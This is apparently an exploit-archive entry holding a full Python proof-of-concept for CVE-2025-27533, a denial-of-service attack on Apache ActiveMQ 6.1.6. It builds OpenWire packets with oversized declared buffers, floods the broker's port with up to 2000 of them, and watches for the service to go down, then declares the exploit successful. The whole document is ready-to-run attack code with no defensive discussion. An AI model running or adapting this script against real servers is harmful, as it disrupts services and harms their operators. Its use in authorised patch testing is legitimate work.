# Exploit Title: Apache ActiveMQ 6.1.6 - Denial of Service (DOS) # Date: 2025-05-9 # Exploit Author: [Abdualhadi khalifa (https://x.com/absholi7ly/) # Github: https://github.com/absholi7ly/CVE-2025-27533-Exploit-for-Apache-ActiveMQ # CVE: CVE-2025-27533 import socket import struct import time import datetime import threading import requests import argparse import random from colorama import init, Fore from tabulate import tabulate from tqdm import tqdm from concurrent.futures import ThreadPoolExecutor init() def print_banner(): banner = f""" {Fore.CYAN}============================================================ CVE-2025-27533 Exploit PoC - Apache ActiveMQ DoS ============================================================ {Fore.YELLOW}Developed by: absholi7ly {Fore.CYAN}============================================================{Fore.RESET} """ print(banner) def _check_server_availability(host, port, admin_port=8161, timeout=2): """Internal function to check server availability""" tcp_reachable = False admin_reachable = False try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(timeout) sock.connect((host, port)) sock.close() tcp_reachable = True except (socket.timeout, ConnectionRefusedError): pass try: response = requests.get(f"http://{host}:{admin_port}/admin", timeout=timeout) admin_reachable = response.status_code == 200 except (requests.Timeout, requests.ConnectionError): pass return tcp_reachable, admin_reachable def check_server_availability(host, port, admin_port=8161, timeout=2, retries=5): for _ in range(retries): tcp_reachable, admin_reachable = _check_server_availability(host, port, admin_port, timeout) if not tcp_reachable: return False, admin_reachable time.sleep(0.5) return True, admin_reachable def parse_hex_or_int(value): try: if value.startswith('0x') or value.startswith('0X'): return int(value, 16) return int(value) except ValueError: raise ValueError(f"Invalid integer or hex value: {value}") def create_malicious_packet(buffer_size=0x1E00000, packet_id=1): command_type = 0x01 client_id = f"EXPLOIT-PACKET-{packet_id:04d}".encode() version = 12 packet = bytearray() packet += b'\x00\x00\x00\x00' packet += struct.pack("B", command_type) packet += struct.pack(">I", len(client_id)) packet += client_id packet += struct.pack(">I", version) packet += struct.pack(">I", buffer_size) packet += bytes(random.randint(0, 255) for _ in range(50)) packet_length = len(packet) - 4 packet[0:4] = struct.pack(">I", packet_length) return packet def send_single_packet(host, port, packet, packet_num, total_packets, buffer_size, packet_status, stop_event): if stop_event.is_set(): return timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3] tcp_reachable, admin_reachable = check_server_availability(host, port) status = f"TCP: {'Up' if tcp_reachable else 'Down'}, Admin: {'Up' if admin_reachable else 'Down'}" local_port = "N/A" connection_status = "Success" max_connect_retries = 5 for connect_attempt in range(max_connect_retries): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024 * 1024) sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 1024) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) try: sock.connect((host, port)) local_port = sock.getsockname()[1] print(f"{Fore.GREEN}[+] Connected to {host}:{port} (Packet {packet_num}/{total_packets}, Port: {local_port}, Buffer: {buffer_size // (1024*1024)} MB){Fore.RESET}") max_retries = 3 for attempt in range(max_retries): try: sock.send(packet) print(f"{Fore.CYAN}[*] Sent Packet {packet_num}/{total_packets} (Port: {local_port}, Buffer: {buffer_size // (1024*1024)} MB){Fore.RESET}") try: response = sock.recv(2048) response_len = len(response) connection_status = f"Success (Response: {response_len} bytes)" except: connection_status = "Success (No Response)" break except socket.error as e: connection_status = f"Failed: {str(e)}" if attempt < max_retries - 1: print(f"{Fore.YELLOW}[-] Failed to send Packet {packet_num}/{total_packets} (Attempt {attempt+1}, Port: {local_port}): {e}. Retrying...{Fore.RESET}") time.sleep(0.5) continue else: print(f"{Fore.RED}[-] Failed to send Packet {packet_num}/{total_packets} after {max_retries} attempts: {e}{Fore.RESET}") packet_status.append([packet_num, timestamp, status, local_port, f"Packet-{packet_num:04d}", connection_status]) break except socket.timeout: print(f"{Fore.RED}[-] Connection timeout for Packet {packet_num}/{total_packets} (Port: {local_port}){Fore.RESET}") packet_status.append([packet_num, timestamp, "Connection Timeout", local_port, f"Packet-{packet_num:04d}", "Timeout"]) break except socket.error as e: error_str = str(e) if "10053" in error_str: error_type = "Connection Reset" elif "timeout" in error_str: error_type = "Timeout" else: error_type = "Other" if "10053" in error_str and connect_attempt < max_connect_retries - 1: print(f"{Fore.YELLOW}[-] [WinError 10053] for Packet {packet_num}/{total_packets} (Attempt {connect_attempt+1}): {e}. Retrying connection...{Fore.RESET}") time.sleep(1) continue print(f"{Fore.RED}[-] Error connecting for Packet {packet_num}/{total_packets} (Port: {local_port}): {e}{Fore.RESET}") packet_status.append([packet_num, timestamp, f"Error: {error_type}", local_port, f"Packet-{packet_num:04d}", f"Error: {error_str}"]) break finally: sock.close() packet = None def send_packets(host, port, total_packets=2000, buffer_sizes=[0x1E00000, 0x3200000]): packet_status = [] stop_event = threading.Event() max_threads = 2 pbar = tqdm(total=total_packets, desc="Sending Packets", unit="packet") def monitor_server(): while not stop_event.is_set(): tcp_reachable, _ = check_server_availability(host, port) if not tcp_reachable: print(f"{Fore.GREEN}[+] Server TCP port {port} is down!{Fore.RESET}") stop_event.set() break time.sleep(1) monitor_thread = threading.Thread(target=monitor_server) monitor_thread.start() packet_num = 1 with ThreadPoolExecutor(max_workers=max_threads) as executor: futures = [] while packet_num <= total_packets and not stop_event.is_set(): buffer_size = random.choice(buffer_sizes) packet = create_malicious_packet(buffer_size, packet_num) future = executor.submit( send_single_packet, host, port, packet, packet_num, total_packets, buffer_size, packet_status, stop_event ) futures.append(future) packet_num += 1 pbar.update(1) time.sleep(random.uniform(0.3, 0.5)) if packet_num % 50 == 0: tcp_reachable, _ = check_server_availability(host, port) time.sleep(2) if not tcp_reachable: print(f"{Fore.GREEN}[+] Server TCP port {port} is down!{Fore.RESET}") stop_event.set() break print(f"{Fore.MAGENTA}[*] {packet_num} packets sent,{Fore.RESET}") pbar.close() stop_event.set() monitor_thread.join() packet_status.sort(key=lambda x: x[0]) total_sent = len(packet_status) successful = sum(1 for p in packet_status if p[5].startswith("Success")) failed = total_sent - successful print(f"\n{Fore.CYAN}[*] Packet Status Table:{Fore.RESET}") print(tabulate( packet_status, headers=["Packet #", "Timestamp", "Server Status", "Local Port", "Packet ID", "Connection"], tablefmt="fancy_grid", stralign="center", numalign="center" )) print(f"\n{Fore.CYAN}[*] Exploit Statistics:{Fore.RESET}") print(f" - Total Packets Sent: {total_sent}") print(f" - Successful Packets: {successful} ({successful/total_sent*100:.2f}%)") print(f" - Failed Packets: {failed} ({failed/total_sent*100:.2f}%)") tcp_reachable, admin_reachable = check_server_availability(host, port) print(f"\n{Fore.CYAN}[*] Final Server Status:{Fore.RESET}") if not tcp_reachable: print(f"{Fore.GREEN}[+] Exploit Successful: TCP port {port} is down!{Fore.RESET}") else: print(f"{Fore.YELLOW}[-] Exploit Incomplete: TCP port {port} still up.{Fore.RESET}") return packet_status def main(): print_banner() parser = argparse.ArgumentParser(description="CVE-2025-27533 Exploit PoC for Apache ActiveMQ") parser.add_argument("--host", default="127.0.0.1", help="Target IP address") parser.add_argument("--port", type=int, default=61616, help="OpenWire port") parser.add_argument("--total-packets", type=int, default=2000, help="Total packets to send") parser.add_argument("--buffer-sizes", type=parse_hex_or_int, nargs='+', default=[0x1E00000, 0x3200000], help="Buffer sizes in bytes (decimal or hex)") args = parser.parse_args() print(f"{Fore.CYAN}[*] Exploit Configuration:{Fore.RESET}") print(f" - Target: {args.host}:{args.port}") print(f" - Total Packets: {args.total_packets}") print(f" - Buffer Sizes: {[f'{size:#x} ({size // (1024*1024)} MB)' for size in args.buffer_sizes]}") print(f"\n{Fore.CYAN}[*] Sending malicious packets...{Fore.RESET}") packet_status = send_packets(args.host, args.port, args.total_packets, args.buffer_sizes) if __name__ == "__main__": try: main() except KeyboardInterrupt: print(f"{Fore.RED}[-] Program interrupted by user.{Fore.RESET}")